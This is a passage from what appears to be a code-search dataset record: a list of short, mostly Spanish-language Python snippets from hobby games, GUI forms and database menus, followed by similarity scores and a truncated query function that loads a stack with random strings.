reply_markup=reply_markup)", "def main():\n\t\n\tif config.FORCE_CONSOLE:\n\t\tdeboggue(\"Le jeu est en mode console\")\n\t\tchoisir_programme()\n\telse:\n\t\tdeboggue(\"Le jeu est en mode graphique\")\n\t\tfenetre = creer_fenetre()\n\t\timages = charge_images()\n\t\tchoisir_programme_gui(fenetre, images)\n\n\tdeboggue(\"Arrêt normal\")", "def pruebas(self):\n self.gestor_pca.pruebas()\n return None", "def accueil():\r\n global etat\r\n background(0,128,128)\r\n image(tireur,0,0) \r\n rectMode(CORNERS)\r\n fill(100)\r\n rect(0,60,250,120)\r\n rect(500,60,750,120)\r\n fill(0)\r\n textSize(30)\r\n text(\"PVP\",95,100) \r\n text(\"ORDINATEUR\",520,100) \r\n if (mousePressed) and mouseX<250 and mouseX>0 and mouseY<120 and mouseY>60: #si on clique sur le rectangle jouer\r\n etat=1 #on passe en mode jeu\r\n if (mousePressed) and mouseX<750 and mouseX>500 and mouseY<120 and mouseY>60: \r\n etat=2", "def on_btnBajacli_clicked(self, widget):\n\n try:\n dni = variables.filacli[0].get_text()\n if dni != '' :\n funcionescli.bajacli(dni)\n funcionescli.listadocli(variables.listclientes)\n funcionescli.limpiarentry(variables.filacli)\n else:\n print('falta dni u otro error')\n except:\n print(\"error en botón baja cliente\")", "def newprojcode(name):\n\tprint \"\\n======Creando Nuevo Proyecto======\\n\"\n\tproject_name = name\n\n\tif project_name == \"\" or project_name == None:\n\t\tcancel()\n\n\tprint \"*Nombre del Proyecto: \", project_name\n\n\tproject_languges = raw_input(\"*Lenguaje: \")\n\tpname = project_name\n\n\tprint \"\\n==================================\\n\"\n\n\tdirectory = str(\"Project_\" + pname + \"/\")\n\n\tif os.path.exists(\"Project\"):\n\t\t#Nos ubicamos en el directorio raiz del Proyecto\n\t\tsubprocess.call([\"mkdir\", directory], shell=True)\n\t\tprint \"Creando el Directorio Raiz...\"\n\telse:\n\t\tos.mkdir(\"Project\")\n\t\tos.chdir(\"Project/\")\n\t\tsubprocess.call([\"mkdir\", directory])\n\t\tif not os.path.exists(directory):\n\t\t\tprint \"LA CARPETA {} NO EXISTE!\".format(directory)\n\t\t\tcancel()\n\t\telse:\n\t\t\tos.chdir(directory)\n\n\tdirs = \"Project\" + pname + \"/\"\n\t#Nos ubicamos en el directorio raiz del Proyecto\n\tos.chdir(dirs)\n\tprint \"Accediendo al Directorio\", dirs + \"...\"\n\tprint \"Creando el Directorio de Iconos...\"\n\tsubprocess.call(\"mkdir Iconos\", shell=True)\t\t#directorio iconos *\n\tprint \"Creando el Directorio de Debug...\"\n\tsubprocess.call(\"mkdir Debug\", shell=True)\t\t#directorio debug *\n\tprint \"Crenado el Directoiro de Scripts...\"\n\tsubprocess.call(\"mkdir Scripts\", shell=True)\t#directorio scripts *\n\tprint \"Creando los Archivos XML del Proyecto...\\n\"\n\tsubprocess.call(\"source XMLProjectFiles.sh\", shell=True)\n\tprint \"Se ha Creado el Proyecto\", pname, \" con Exito!!\"\n\n\t#Se crea el codigo de verificacion del proyecto\n\tfor i in range(0, 15):\n\t\tx = random.randint(1, 1000000)\t#Calcula numeros aleatorios de 1 a 1,000,000(1 millon)\n\t\tVerifiCode = x\t\t\t\t\t#VerifiCode deja el valor de 0 y toma el valor de x\n\t\tCodeValue = bin(VerifiCode)\t\t#Encripta el codigo a binario\n\n\tprint \"Su codigo de proyecto es:\", CodeValue + \"\\n\"\n\tSaveKey(CodeValue)\n\tprint \"Realizando copias de archivos prioritarios a los servidores...\"\n\tpcommands.ServerCopy()\n\tprint \"Copias realizadas con exito!!\"", "def configurar():\n try:\n with open(f'archivos{ruta()}valores_puntajes.json',\n encoding='UTF-8') as f:\n dic = json.load(f)\n except FileNotFoundError:\n dic = crear_valores_puntajes()\n with open(f'archivos{ruta()}valores_puntajes.json', 'w',\n encoding='UTF-8') as f:\n json.dump(dic, f, indent=4)\n\n letras = dic['Personalizada']['bolsa']\n lista_letras= []\n for elemento in letras:\n lista_letras.append(elemento[0])\n valor_letra = letras[0][1] \n valor_punto = dic['Personalizada']['puntos_letra']['a']\n layout=[\n [sg.T(\"Perfil personalizado\", size=(17,1), justification = \"center\",\n font=(\"Georgia\", 17))],\n [sg.T(\"Letra\",font=(\"Georgia\", 12)),\n sg.Combo(lista_letras, size=(8,1), default_value= 'a', enable_events=True),\n sg.T(\"Cantidad:\", font=(\"Georgia\", 12),),\n sg.Slider(range=(1, 12), orientation='h', size=(13, 20), default_value=valor_letra),\n sg.T(\"Valor:\", font=(\"Georgia\", 12),),\n sg.Slider(range=(1, 20), orientation='h', size=(20, 20), default_value=valor_punto)],\n [sg.T(\"Dificultad de la IA: \"),\n sg.DropDown(('Facil','Medio','Dificil'),\n default_value=(dic['Personalizada']['dificultad_IA']),size=(10,1)),\n sg.T(\"Dificultad del tablero: \"),\n sg.DropDown(('Facil','Medio','Dificil'),\n default_value=(dic['Personalizada']['dificultad_Tablero']),size=(10,1))],\n [sg.Button(\"Guardar\", size=(12, 1), key=\"-guardar-\")]\n ]\n\n window_configurar = sg.Window(\"ScrabbleAR - Configurar\").Layout(layout)\n\n while True:\n event, values = window_configurar.Read()\n \"\"\"\n values[0] = retorna la letra elegida\n values[1] = retorna la cantidad de letras\n values[2] = retorna el puntaje seleccionado\n values[3] = retorna la dificultad de la IA\n values[4] = retorna la dificultad del tablero\n \"\"\"\n try:\n for item in letras:\n if item[0] == values[0]:\n valor_letra = int(item[1])\n window_configurar.find_element(1).Update(valor_letra)\n valor_punto = dic['Personalizada']['puntos_letra'][values[0]]\n window_configurar.find_element(2).Update(valor_punto)\n except:\n break\n if event == None:\n break\n elif event == '-guardar-':\n for item in letras:\n if item[0] == values[0]:\n item[1] = int(values[1])\n break\n dic['Personalizada']['bolsa'] = letras\n dic['Personalizada']['puntos_letra'][values[0]] = int(values[2])\n dic['Personalizada']['dificultad_IA'] = values[3]\n dic['Personalizada']['dificultad_Tablero'] = values[4]\n try:\n with open(f'archivos{ruta()}valores_puntajes.json', 'w', encoding='UTF-8') as f:\n json.dump(dic, f, indent=4)\n sg.popup('Se guardaron los cambios', auto_close= True, auto_close_duration= 1)\n except FileNotFoundError:\n sg.popup('No se encuentra el archivo \"valores_puntajes.json\"')\n window_configurar.Close()", "def on_menuBarPreciosServicios_activate(self,widget):\n\n try:\n variables.venPrecios.show()\n conexion.cur.execute('select * from precios')\n precios = conexion.cur.fetchall()\n variables.entPrecioDesayuno.set_text(str(precios[0][0]))\n variables.entPrecioComida.set_text(str(precios[0][1]))\n variables.entPrecioParking.set_text(str(precios[0][2]))\n except:\n print('error abrir ventana precios')", "def run():\n menu_activo = False\n opciones = [#Opciones del juego, un arreglo que contiene tuplas (\"Nombre_opcion\", funcion_asociada)\n (\"Jugar\", comenzar_nuevo_juego),#Escena uno, donde Link se enfrenta con los minijefes\n (u\"¿Como Jugar?\", como_jugar),#La u al principio es para indicar a pygame el caracter unicode de las tildes y signo de pregunta. Se muestra una escena donde se dira al usuario, como jugar\n (\"Creditos\", creditos),\n (\"Salir\", salir_del_programa)#Opcion para salir del programa\n ]\n fondo = pygame.image.load(\"imagenes/imgInicio.png\").convert()\n miMenu = menu.Menu(opciones)\n while not menu_activo:\n for e in pygame.event.get():\n if e.type == QUIT:\n # pygame.quit()\n # quit()\n import sys\n sys.exit(0)\n screen.blit(fondo, (0, 0))#Establecemos el fondo\n miMenu.actualizar()#eventos para el menu\n miMenu.imprimir(screen)#mostramos las opciones del menú\n pygame.display.update()#actualizamos !!!IMPORTANTE PARA QUE SE MUESTRE CORRECTAMENTE\n clock.tick(50)#Transicion de frames por segundo, da un efeco de transcion al menu\n #comenzar_nuevo_juego() #Funcion que comienza un nuevo juego ", "def aplicar_operacion_basicas(self,operacion,complejo1,complejo2):\n nuevo_complejo = self.controlador.ejecutar_operacion_basica(operacion,complejo1,complejo2)\n print('\\nResultado\\n')\n nuevo_complejo.formaBinomica()\n nuevo_complejo.formaPolar()\n print('\\n')", "def ventanaprincipal():\r\n titulo_principal=pygame.image.load(\"../recursor/Imagenes juegos/parejas_1.png\")\r\n ventana.blit(titulo_principal, (405,0))\r\n logo_plaython=pygame.image.load(\"../recursor/Imagenes juegos/plaython.png\")#Cargamos la imagen del logo\r\n imagen_decoracion=pygame.image.load(\"../recursor/Imagenes juegos/imagenpc.png\")\r\n imagen_decoracion = pygame.transform.scale(imagen_decoracion, (210, 210))\r\n ventana.blit(logo_plaython, (900, 180))\r\n ventana.blit(imagen_decoracion,(100,240))\r\n titulo_plaython = pygame.image.load(\"../recursor/Imagenes juegos/TITULOPLAYTHON.png\")\r\n titulo_plaython = pygame.transform.scale(titulo_plaython, (240, 150))\r\n ventana.blit(titulo_plaython, (505, 550))", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def draw_register_block(host, port):\n root = tkinter.Tk()\n\n root.title('Регистрация в чате')\n\n lbl = tkinter.Label(text='Введите имя')\n ent = tkinter.Entry(width=40)\n but = tkinter.Button(text=\"Зарегистрироваться\")\n\n but.bind(\"<Return>\", lambda event: asyncio.run(\n register_user(host, port, ent))\n )\n\n lbl.pack()\n ent.pack()\n\n but[\"command\"] = lambda: asyncio.run(\n register_user(host, port, ent)\n )\n but.pack()\n\n root.mainloop()", "def updatePeliculas():\n\txml_ciudades = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1\"\n\txml_peliculas = \"http://api2.cinemex.com/rsvr.php?Action=GetFiltrados&IdDev=1&ciudad=%s&byciudad=1\" #id_ciudad\n \n\tciudades = parse_ciudades( urlopen(url_movil) ) \n\t\n\t\n\tbase_url_pelicula = \"http://www.cinemex.com/cartelera/pelicula.php?vcode=%s\" #mex_vc\n\tpeliculas = {}\n \n\tpelis_obj = [] #Contiene toda la info de las peliculas, titulo, sinopsis, etc\n \n\t#Crea un diccionario con el vc y el objeto de la pelicula\n\t#De esta forma no hay peliculas repetidas\n\tfor ciudad_id in ciudades:\n\t\txml_url = xml_peliculas % ciudad_id\n\t\ttry:\n\t\t\txml = urlopen(xml_url)\n\t\texcept:\n\t\t\tlogger.debug( 'error cargando pagina %s' % xml_url)\n\t\t\tcontinue\n\t\tpelis_actual = parse_peliculas(xml)\n\t\t#Agregar las peliculas q no estan todavia\n\t\tfor peli in pelis_actual:\n\t\t\tkey = peli.get('mex_vc', '')\n\t\t\tif key not in peliculas: peliculas[key] = peli\n \n\tfor k, v in peliculas.items():\n\t\turl = base_url_pelicula % k\n\t\thtml = urlopen(url)\n\t\tpelis_obj.append(scrape_pelicula(html, v))\n \n\tfor peli in pelis_obj:\n\t\tcreatePelicula(peli)", "def acquisizioneParametri(self):\n\n messaggio =''\n\n try: \n self.__rete = slugify(self.ui.nomeRete.text())\n # controllo se la lunghezza del nome inserito sia > di 5 caratteri\n if(len(self.__rete) < 5 or len(self.__rete) > 30):\n\n messaggio = 'err: inserimento Nome'\n raise NameError\n \n # controllo che il nome scelto sia univoco\n isPresent = self.__NNNameCheck()\n if(isPresent):\n messaggio = 'err: nome già utilizzato'\n raise NameError\n\n # controlli su numero layer e numero nodi che siano >= 1\n # e che siano rispettivamente <= 20 e <= 50\n self.__layer = int(self.ui.nLayer.text())\n if(self.__layer < 1):\n messaggio = 'err: numero layer < 1'\n raise ValueError\n elif(self.__layer >= 20):\n messaggio = 'err: numero layer > 20'\n raise ValueError\n\n self.__nodi = int(self.ui.nNodi.text())\n if(self.__nodi < 1):\n messaggio = 'err: numero nodi < 1'\n raise ValueError\n if(self.__nodi >= 50):\n messaggio = 'err: numero nodi > 50'\n raise ValueError\n\n # salvataggio della funzione scelta\n self.__funzione = self.ui.funzione.currentText()\n \n # controllo che la percentuale di Vs sia < 25%\n # e che la percentuale di Ts sia > 75%\n if(self.__percentuale < 25):\n messaggio = 'err: suddivisione'\n raise ValueError\n if (self.__percentuale > 75):\n messaggio = 'err: suddivisione'\n raise ValueError\n\n # controllo che sia stato scelto effettivamente un dataset\n if(len(self.__dataSet) == 0):\n messaggio = 'err: dataSet errato'\n raise NameError\n\n # setto il tasto caricamento di una rete non cliccabile\n self.ui.but_caricaRete.setEnabled(False)\n\n # cambio nome del tasto convalida\n self.ui.but_convalida.setText('confermato')\n self.ui.comunicazione.setText('')\n #abilito salvataggio\n self.ui.but_salva.setEnabled(True)\n\n # settandola a True permetto che il training venga effettuato\n # dato che i dati inseriti sono validi\n self.__convalida = True\n return True\n except:\n # in caso di eccezzioni faccio comparire il messaggio\n self.ui.comunicazione.setText(messaggio)\n return False", "def tirar_foto(frame, dimensoes, file_name, vaga, entrada_saida=\"E\"):\n (x, y, w, h) = dimensoes[0], dimensoes[1], dimensoes[2], dimensoes[3]\n file = f\"imagens/{file_name}.png\"\n imagem = frame[y:y + h, x:x + w]\n cv2.imwrite(file, imagem)\n print(f'foto salva -> {file_name}')\n\n print(\"detectando placa....\")\n recognize_license_plate(file, vaga, entrada_saida)\n print(\"fim detecção placa\")", "def entero(self):\n return int(\"\".join(self.binario), 2)", "def velocidade_porta(self): # Testar este metodo.\r\n porta, velocidade = args\r\n if \"usb\" in porta:\r\n if velocidade:\r\n ## Retorna \"0\" se executado com sucesso\r\n status = subprocess.call(\r\n \"stty -F /dev/ttyUSB0 speed {0}\".format(velocidade),shell=True)\r\n else:\r\n status = subprocess.call(\r\n \"stty -a < /dev/ttyUSB0\",shell=True)\r\n else:\r\n pass\r\n\r\n if status == 0:\r\n # comando executado com sucesso\r\n return {\"status\": 1}\r\n else:\r\n return {\"status\": 0}", "def iniciarEtiquetas(self):\n self.ingrese = Label(self.master, text=\"Ingrese sus datos\", font=\"Arial 12\", width=45)\n self.ingrese.grid(row=0, column=0, sticky=N, columnspan=5, pady=10)\n self.ingrese.configure(bg=\"#9a32cd\")\n self.tituloLabel = self.crearEtiqueta(\"Título\", \"Arial 12\", 1, 0, \"#f2f2f2\")\n self.descripcionLabel = self.crearEtiqueta(\"Descripción\", \"Arial 12\", 2, 0, \"#f2f2f2\")\n self.mostrarString.set('Mostrando Registros Existentes en ' + str(self.base.getDbName()))\n self.tituloTree = Label(text=self.mostrarString.get(), font=\"Arial 10\", bg=\"#d9d9d9\")\n self.tituloTree.grid(row=3, column=0, sticky=N, columnspan=4,pady=10)", "def reemplaza_tildes(palabra):", "def saluda1(sujeto):\n print 'Hola '+sujeto+' !!'", "def run_ejercicio_3():\n\n # Parametros para el ejercicio\n lower = 0\n upper = 4 * np.pi\n number_of_points = 100\n\n print(f\"Separando el intervalo [{lower}, {upper}] en {number_of_points} puntos equidistantes\")\n values = np.linspace(lower, upper, number_of_points)\n print(\"\")\n\n print(f\"Mapeando los valores a las tres funciones dadas\")\n sin_values, cos_values, complex_function_values = map_values_to_functions(values)\n print(\"\")\n\n print(f\"Los valores son: {values}\\n\")\n print(f\"Valores en el seno: {sin_values}\\n\")\n print(f\"Valores en el coseno: {cos_values}\\n\")\n print(f\"Valores en tanh(sin + cos): {complex_function_values}\\n\")\n print(\"\")\n wait_for_user_input()\n\n print(\"Mostrando la grafica de los valores\")\n plot_three_functions(values, sin_values, cos_values, complex_function_values)", "def update():\n\tid_update = int(input(\"Ingrese ID de pokemon: \"))\n\texistencia = \"\"\"\n\t\t\t\tSELECT * FROM sansanito\n\t\t\t\tWHERE id = :1\"\"\"\n\tcur.execute(existencia, [id_update])\n\tres = cur.fetchall()\n\t# Si res es vacio, no existe ningun registro con ID ingresado\n\tif res == []:\n\t\tprint(\"ID no encontrado en la tabla!\")\n\t\tprint(\"Devolviendo al menu principal...\")\n\t\ttime.sleep(1)\n\t\treturn\n\telse:\n\t\t# Submenu de la opcion\n\t\tupdate_menu_title = \"QUE CAMPO DE REGISTRO CON ID \" + str(id_update) + \" DESEA CAMBIAR?\\n\"\n\t\tupdate_menu_items = [\"HP Actual\", \"Estado\", \"Fecha y hora de ingreso\", \"Salir\"]\n\t\tupdate_menu_cursor = \"> \"\n\t\tupdate_menu_cursor_style = (\"fg_red\", \"bold\")\n\t\tupdate_menu_style = (\"bg_purple\", \"fg_yellow\")\n\t\tupdate_menu_exit = False\n\n\t\tupdate_menu = TerminalMenu(menu_entries=update_menu_items,\n\t\t\t\t\t\t\t title=update_menu_title,\n\t\t\t\t\t\t\t menu_cursor=update_menu_cursor,\n\t\t\t\t\t\t\t menu_cursor_style=update_menu_cursor_style,\n\t\t\t\t\t\t\t menu_highlight_style=update_menu_style,\n\t\t\t\t\t\t\t cycle_cursor=True,\n\t\t\t\t\t\t\t clear_screen=True)\n\n\twhile not update_menu_exit:\n\t\tupdate_sel = update_menu.show()\n\t\tprint(\"REGISTRO ESCOGIDO:\")\n\t\tprint_table(hdrs_sansanito, True, res)\n\t\t# Cambiar HP Actual\n\t\tif update_sel == 0:\n\t\t\thp_actual = int(input(\"Ingrese HP actual de pokemon: \"))\n\t\t\tquery_estnom = \"\"\"\n\t\t\t\t\t\t\tSELECT nombre, estado\n\t\t\t\t\t\t\tFROM sansanito\n\t\t\t\t\t\t\tWHERE id = :1\"\"\"\n\t\t\tcur.execute(query_estnom, [id_update])\n\t\t\testnom = cur.fetchall()\n\t\t\tprioridad = calculate_priority(estnom[0][0], hp_actual, estnom[0][1])\n\t\t\tif prioridad != -1:\n\t\t\t\tquery_update = \"\"\"\n\t\t\t\t\t\t\t\tUPDATE sansanito\n\t\t\t\t\t\t\t\tSET hpactual = :1, prioridad = :2\n\t\t\t\t\t\t\t\tWHERE id = :3\"\"\"\n\t\t\t\tcur.execute(query_update, [hp_actual, prioridad, id_update])\n\t\t# Cambiar estado\n\t\telif update_sel == 1:\n\t\t\testado = input(\"Ingrese el estado. Si el pokemon no tiene estado, ingrese X: \")\n\n\t\t\tif estado.upper() == \"X\":\n\t\t\t\testado = None\n\n\t\t\tif estado not in estados_permitidos:\n\t\t\t\tprint(\"Estado de pokemon no permitido. Registro no fue insertado.\")\n\t\t\t\tprint(\"Devolviendo al menu de update...\")\n\t\t\t\ttime.sleep(1)\n\t\t\telse:\n\t\t\t\tquery_nomhp = \"\"\"\n\t\t\t\t\t\t\t\tSELECT nombre, hpactual\n\t\t\t\t\t\t\t\tFROM sansanito\n\t\t\t\t\t\t\t\tWHERE id = :1\"\"\"\n\t\t\t\tcur.execute(query_nomhp, [id_update])\n\t\t\t\tnomhp = cur.fetchall()\n\t\t\t\tprioridad = calculate_priority(nomhp[0][0], nomhp[0][1], estado)\n\t\t\t\tif prioridad != -1:\n\t\t\t\t\tquery_update = \"\"\"\n\t\t\t\t\t\t\t\tUPDATE sansanito\n\t\t\t\t\t\t\t\tSET estado = :1, prioridad = :2\n\t\t\t\t\t\t\t\tWHERE id = :3\"\"\"\n\t\t\t\t\tcur.execute(query_update, [estado, prioridad, id_update])\n\t\t# Cambio de fecha de ingreso\n\t\telif update_sel == 2:\n\t\t\tfecha = input(\"Ingrese la fecha en formato DD/MM/YY HH:MM (ej 06/09/20 14:20): \")\n\t\t\tprint(\"Nueva fecha\", fecha)\n\t\t\tquery_fecha = \"\"\"\n\t\t\t\t\t\tUPDATE sansanito\n\t\t\t\t\t\tSET ingreso = to_date(:1, 'DD/MM/YY HH24:MI')\n\t\t\t\t\t\tWHERE id = :2\n\t\t\t\t\t\t\"\"\"\n\t\t\tcur.execute(query_fecha, [fecha, id_update])\n\t\t# Salir\n\t\telif update_sel == 3:\n\t\t\tupdate_menu_exit = True\n\n\t\tcur.execute(existencia, [id_update])\n\t\tres = cur.fetchall()", "def OnButton(self, event):\n chicloVrach = random.randint(123, 130)\n\n print('chislo',chicloVrach )\n self.Glavnaja()", "def esperarUnRato(self):\n if self.stepByStep:\n sleep(0.7)\n self.telaMAPA.update()\n self.pantalla.update()", "def abrirDialogoDeConfiguracion(self):\n ventanaEmergente = Toplevel()\n ventanaEmergente.geometry(\"200x320\")\n # Se crea un canvas\n tela = Canvas(ventanaEmergente, height=320, width=200, bg=\"snow\")\n tela.place(x=0, y=0)\n btnColorEspacioDisponible = Button(tela, text=\"Espacio Disponible\", command = lambda :self.cambiarColor(0))\n btnColorEspacioDisponible.place(x=50, y=20)\n btnColorPared = Button(tela, text=\"Paredes\", command = lambda :self.cambiarColor(2))\n btnColorPared.place(x=66, y=50)\n btnColorNodo = Button(tela, text=\"Nodo\", command = lambda :self.cambiarColor(3))\n btnColorNodo.place(x=70, y=80)", "def actualizar_puntaje(self):\r\n pass", "def atencion_ingreso(self, camion):\r\n\r\n operaciones = self.operaciones[\"Operaciones complementarias\"]\r\n\r\n if camion.tipo == \"Descarga\":\r\n yield self.process(operaciones[\"Atencion recepcion 1\"]\r\n .ejecutar(self, camion))\r\n else:\r\n yield self.process(operaciones[\"Atencion despacho 1\"]\r\n .ejecutar(self, camion))\r\n\r\n if camion.carga not in [\"Contenedor 20\", \"Contenedor 40\"] and \\\r\n not (camion.tipo == \"Carga\" and camion.carga == \"Harina de Soya - Hi Pro/Pellet de Soya\"):\r\n yield self.process(operaciones[\"Primer pesaje\"]\r\n .ejecutar(self, camion))\r\n self.exit(camion.nombre)", "def cobroEfectivo(self):\n if self.total_a_pagar == 0:\n QtGui.QMessageBox.information(self,\"Aviso\",\"El saldo restante a pagar es cero\")\n else:\n self.rbtnEfectivo.setChecked(True)\n monto_a_pagar, ok = QtGui.QInputDialog.getDouble(self,\"Cobro Efectivo\",\"Ingrese monto a pagar\",0,0,2000,2)\n\n if ok:\n if monto_a_pagar >= self.total_a_pagar:\n QtGui.QMessageBox.information(self,\"Cobro Efectivo\",\"Su vuelto es:%.2f\" % (monto_a_pagar - self.total_a_pagar))\n temp = [\"Efectivo\",monto_a_pagar]\n self.detalles_cobro[self.tablePagos.rowCount()] = temp\n self.total_a_pagar = 0\n elif monto_a_pagar == 0:\n QtGui.QMessageBox.information(self,\"Aviso\",\"El monto ingresado no puede ser cero\")\n else:\n temp = [\"Efectivo\",monto_a_pagar]\n self.detalles_cobro[self.tablePagos.rowCount()] = temp\n self.total_a_pagar -= monto_a_pagar\n\n self.actualizar_total()\n self.actualizar_tabla()", "def imprimir_menu():\n print(\"Que desea realizar en la matriz\")\n print(\"1. Presentar el nro Central \")\n print(\"2. Presentar los nros en forma espiral desde el centro \")\n print(\"3. Multiplos del nro central\")", "def crear_arbol():\n print (\"En este programa te brindamos 2 opciones para crear arboles, elige la que mas se adapte a tu objetivo\")\n \n try:\n crear=int(input(\"1. Crear un arbol de manera aleatoria\\n2. Introducir los datos en forma de arreglo\\n\"))\n except:\n print(\"Valor Invalido\")\n \n if crear==1:\n print(\"\\nExcelente! Tu arbol sera generado de forma aleatoria. Solo necesitamos aclarar que tipo de arbol quieres\")\n while True:\n try:\n altura=int(input(\"\\nAñade la altura de tu arbol: \"))\n except:\n print(\"El valor introducido no es valido!\")\n else:\n break\n \n perfecto=input(\"\\n¿Deseas crear un arbol perfecto? (si/no): \")\n if perfecto.lower()!=\"no\":\n perfecto=True\n else:\n perfecto=False\n \n arbol=tree(height=altura, is_perfect=perfecto)\n return arbol\n \n elif crear==2:\n print(\"\\nExcelente! Tu arbol sera generado en base a un arreglo. Solo necesitamos recibir los valores\")\n valores=[]\n counter=0\n print(\"\\nIntroduce los valores en orden. El valor inicial sera considerado la raiz. Los valores se ordenaran de izquiera a derecha.\" +\n \"Deja el valor en blanco para saltar ese espacio. Escribe -1 para dejar de añadir valores\")\n valor=\" \"\n while valor!=\"-1\":\n valor=input(f\"Introduzca el valor {counter}: \")\n if valor==\"\":\n valor=None\n valores.append(valor)\n counter+=1\n else:\n valores.append(int(valor))\n counter+=1\n valores.pop()\n root=build(valores)\n return root", "def cambiar_puntaje(self):\r\n self.puntaje_maximo = self.puntos_maximos.value()\r\n sleep(0.1)\r\n puntaje = {\"status\": \"cambio_puntaje\",\r\n \"data\": self.puntaje_maximo}\r\n self.server_signal_2.emit(puntaje)", "def main():\n\tFORCE_CONSOLE = False\n\n\tif FORCE_CONSOLE:\n\t\tdeboggue(\"Le jeu est en mode console\")\n\t\tchoisir_programme()\n\telse:\n\t\tdeboggue(\"Le jeu est en mode graphique\")\n\t\tfenetre = creer_fenetre()\n\t\timages = charge_images()\n\t\tchoisir_programme_gui(fenetre, images)\n\n\tdeboggue(\"Arrêt normal\")", "def instructions():\n print(\n \"\"\"\n TURNING ON TELEVISION\n\n Use your keypad to interact with the television:\n 1. Enter a number to change change\n 2. Enter \"up\" or \"down\" to adjust volume\n 3. Enter \"off\" to turn on television\n\n \"\"\")" ]
[ "0.6960144", "0.62438864", "0.5807747", "0.5806468", "0.5786809", "0.5756569", "0.5700163", "0.5687251", "0.55761003", "0.5567695", "0.5562708", "0.55521", "0.5552041", "0.5549286", "0.5544261", "0.5521034", "0.5520254", "0.54952437", "0.54869676", "0.5480632", "0.54718786", "0.546732", "0.54637545", "0.5458825", "0.54503566", "0.5448864", "0.5444995", "0.54365414", "0.54284465", "0.540552", "0.54053223", "0.5397443", "0.53966594", "0.53886485", "0.53865594", "0.5351897", "0.53487986", "0.5342529", "0.53425276", "0.53406924", "0.53235245", "0.5322911", "0.53216803", "0.5309036", "0.52929175", "0.52879536", "0.5287535", "0.5268164", "0.5263588", "0.52507865", "0.5243421", "0.5237766", "0.5233427", "0.5226427", "0.5215421", "0.5210035", "0.5208519", "0.5194367", "0.5187817", "0.5187339", "0.5185231", "0.5179766", "0.51778847", "0.51714903", "0.51533026", "0.5150834", "0.51490664", "0.5147175", "0.5143922", "0.51364636", "0.5120341", "0.5119915", "0.511856", "0.5112188", "0.5112188", "0.5112188", "0.5112188", "0.5112188", "0.51115227", "0.5109452", "0.5101306", "0.5092109", "0.5079562", "0.5078489", "0.5074811", "0.5071806", "0.5059349", "0.50593126", "0.50572777", "0.5051779", "0.5051364", "0.50484395", "0.50459", "0.503871", "0.5030184", "0.50262725", "0.50222534", "0.50218254", "0.50165683", "0.5014186" ]
0.53275734
40
Carga tola la pila con strings
def cargaAutoStr(pila): while not pila_llena(pila): largo = random.randint(1, 15) apilar(pila, randString(largo))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def comenzar_nuevo_juego():\n escena_uno.cargarEscena1(screen, display_width, display_height)#Se pone a correr la escena\n #escena_uno.cargarEscena2(screen, display_width, display_height)", "def stringToPila(palabra):\n pila = Pila()\n for elemento in palabra:\n apilar(pila, elemento)\n return pila", "def saluda2(sujeto):\n print 'Hola %s !!' % sujeto", "def concatenare_str(obiect, string):\n\tobiect[\"descriere\"] = get_descriere(obiect) + string\n\treturn obiect", "def arroba_letras(cadena, long_palabra, costo_palabra_corta, costo_palabra_larga):\n palabras = cadena.split(\" \")\n frase_final = \"\"\n costo_total = 0\n for i in range(len(palabras)):\n if len(palabras[i]) > long_palabra:#verificio si la longitud de esa palabra cortada es menor a lo previamente establecido\n frase_final += palabras[i][0:long_palabra] + \"@ \" # corto la palabra en la posicion max y agrego un @\n costo_total += costo_palabra_corta\n if palabras[i][-1] == \".\": # veo si en la palabra corta cortada hay un punto y si lo lo borro y reemplazo por un STOP\n frase_final = frase_final.strip() + palabras[i].replace(palabras[i], \" STOP \")\n elif palabras[i][-1] == \".\": # veo si en la palabra larga cortada hay un punto y si lo hay lo borro y lo reemplazo por un STOP\n frase_final = frase_final.strip(\".\") + palabras[i].replace(palabras[i][-1], \" STOP \") \n else:\n frase_final += palabras[i] + \" \"\n costo_total += costo_palabra_larga\n frase_final += \"STOPSTOP\" \n \n return f\"\"\"El telegrama final es: \n{frase_final} \nutilizando {long_palabra} letras maximas por palabra a un costo de ${costo_total} \"\"\"", "def priprema_za_extrakciju_stringova_po_prethodno_generiranoj_naredbi(loka, nare):\r\n lscrypt=loka+'\\\\scrypt.ps1'\r\n narediti=nare\r\n file=open(lscrypt, \"w\")\r\n file.write(narediti)\r\n file.close()", "def archivos_de_texto():\n palabra = \"\" \n palabras_candidatas = [] #lista donde se guardara las palabras candidatas de cada linea\n palabra_cantidad = {} #diccionario con la palabra candidata de clave y las veces que esta repetida en cada texto de valor\n with open(\"Cuentos.txt\",\"r\") as Cuentos: \n for linea_Cuentos in Cuentos: #cada ciclo del for es una linea del texto\n for caracter in linea_Cuentos: #cada ciclo del for es una caracter de la linea \n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter) #se transformas caracteres mayusculas y tildes\n palabra += caracter #cada caracter ira formando la palabra\n if not caracter.isalpha():\n if len(palabra) >= 5: #se analiza que la palabra tenga 5 o mas caracteres\n palabras_candidatas.append(palabra) \n palabra = \"\" #se vacia la palabra ya analizada\n for palabra_en_lista in palabras_candidatas: #se introduce las palabras candidatas a un diccionario\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [1,0,0]\n else:\n palabra_cantidad[palabra_en_lista] = [int(palabra_cantidad[palabra_en_lista][0]) + 1 , 0, 0]\n palabras_candidatas = []\n with open(\"La araña negra - tomo 1.txt\",\"r\") as La_arana_negra:#se repite el mismo proceso con los otros dos textos\n for linea_Cuentos in La_arana_negra:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,1,0]\n else:\n palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] , int(palabra_cantidad[palabra_en_lista][1]) + 1, 0]\n palabras_candidatas = [] \n with open(\"Las 1000 Noches y 1 Noche.txt\",\"r\") as muchas_noches: \n for linea_Cuentos in muchas_noches:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n 